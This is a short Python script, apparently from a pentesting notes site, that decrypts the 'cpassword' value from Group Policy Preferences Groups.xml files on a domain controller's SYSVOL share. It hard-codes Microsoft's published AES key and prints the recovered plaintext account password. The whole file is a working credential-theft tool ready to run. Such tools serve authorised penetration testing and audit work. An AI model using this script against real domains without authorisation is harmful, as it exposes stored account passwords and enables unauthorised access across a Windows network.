decrypt_cpassword.py

The AES key used to decrypt is public: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN

#!/usr/bin/python3
#---------------------------------------------------------------------
# Name        : decrypt_cpassword.py
# Description : Decrypt the cpassword attribute value embedded in
#               Groups.xml stored in the DC's SYSVOL share.
# Author       : Lisandre.com
# Prereq       : PyCryptodome (PyCrypto does not work with python 3.10.4)
#                sudo pip3 install pycryptodomex # BREAKS IMPACKET...
#---------------------------------------------------------------------
import sys
from base64 import b64decode
from Cryptodome.Cipher import AES

### CHANGE THIS ###
cpassword = "abc...def"

padding = '=' * (4 - len(cpassword) % 4)
epass = cpassword + padding
decoded = b64decode(epass)

key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8' \
      b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
iv = b'\x00' * 16
aes = AES.new(key, AES.MODE_CBC, iv)

print(aes.decrypt(decoded).decode(encoding='ascii').strip())